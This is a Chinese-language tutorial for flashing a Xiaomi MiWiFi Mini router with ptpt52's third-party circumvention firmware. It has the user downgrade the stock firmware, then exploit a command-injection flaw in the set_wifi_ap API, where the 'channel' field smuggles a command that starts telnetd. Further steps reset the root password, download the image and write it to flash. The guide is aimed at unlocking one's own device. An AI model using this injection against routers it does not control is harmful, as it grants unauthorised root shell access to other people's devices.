在ubuntu编译好的科学路由器固件下载地址
本文刷机的固件是由ptpt52发布的科学上网路由器固件,下载地址:
代码: 全选
http://router-sh.ptpt52.com/rom/ptpt52-2.0.0_build201612311228-ramips-mt7620-miwifi-mini-squashfs-sysupgrade.bin
1.
下载 miwifi 路由器 2.6.17 版本的固件,我们需要利用这个固件的漏洞进行刷机
代码: 全选
http://bigota.miwifi.com/xiaoqiang/rom/r1cm/miwifi_r1cm_firmware_ace10_2.6.17.bin
你可能已经更新过版本,我们需要降级到 2.6.17 版本
登录小米路由器mini的管理页面 http://192.168.31.1/ 选择升级,手动升级,选择文件 miwifi_r1cm_firmware_ace10_2.6.17.bin
升级的时候注意要选择恢复默认配置
3.
升级到 2.6.17之后,重新连接小米路由,需要初始化设置密码,比如密码设置成 88888888
4.
开始进行刷机:利用代码注入漏洞
a) 登录 http://192.168.31.1/ 登录后你会看到URL地址里面有个类于 stok=3173f347ad3d391bf7eb48d03ac758b7
b) 记下 3173f347ad3d391bf7eb48d03ac758b7
然后,构造如下的网址:(注意你的stok不是这个,用你自己的替换)
代码: 全选
http://192.168.31.1/cgi-bin/luci/;stok=3173f347ad3d391bf7eb48d03ac758b7/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd
代码: 全选
{"msg":"未能連線到指定Wi-Fi(Probe timeout)","code":1616}
代码: 全选
http://192.168.31.1/cgi-bin/luci/;stok=3173f347ad3d391bf7eb48d03ac758b7/api/xqsystem/set_name_password?oldPwd=88888888&newPwd=11111111
telnet 192.168.31.1
提示登录
用户名 root
密码 11111111
登录后,在保证小米路由器联网的情况下,下载固件进行刷机:
代码: 全选
cd /tmp/
wget -O miwifi.bin http://router-sh.ptpt52.com/rom/ptpt52-2.0.0_build201612311228-ramips-mt7620-miwifi-mini-squashfs-sysupgrade.bin
确认板子
cat /proc/mtd
如果看到结果是这样:
root@XiaoQiang:~# cat /proc/mtd
dev: size erasesize name
mtd0: 01000000 00010000 "ALL"
mtd1: 00030000 00010000 "Bootloader"
mtd2: 00010000 00010000 "Config"
mtd3: 00010000 00010000 "Factory"
mtd4: 00c80000 00010000 "OS1"
mtd5: 00b19a3b 00010000 "rootfs"
mtd6: 00200000 00010000 "OS2"
mtd7: 00100000 00010000 "overlay"
mtd8: 00010000 00010000 "crash"
mtd9: 00010000 00010000 "reserved"
mtd10: 00010000 00010000 "Bdata"
那么就用这个命令刷机:
代码: 全选
mtd -r write miwifi.bin OS1
如果看到是这个样子:
root@XiaoQiang:/tmp# cat /proc/mtd
dev: size erasesize name
mtd0: 01000000 00010000 "ALL"
mtd1: 00030000 00010000 "Bootloader"
mtd2: 00010000 00010000 "Config"
mtd3: 00010000 00010000 "Factory"
mtd4: 00c80000 00010000 "OS1"
mtd5: 00b26e43 00010000 "rootfs"
mtd6: 00200000 00010000 "OS2"
mtd7: 00100000 00010000 "overlay"
mtd8: 00010000 00010000 "crash"
mtd9: 00010000 00010000 "reserved"
mtd10: 00010000 00010000 "Bdata"
mtd11: 00fa0000 00010000 "firmware"
那么就用这个命令刷机:
代码: 全选
mtd -r write miwifi.bin firmware
刷机后自动重启,大概5-8分钟,然后你看到无线 SSID 名字是 PTPT52_XXXX 密码是 88888888
管理页面地址 http://192.168.15.1/
用户名 root
密码 admin
之后你就可以登录进行配置了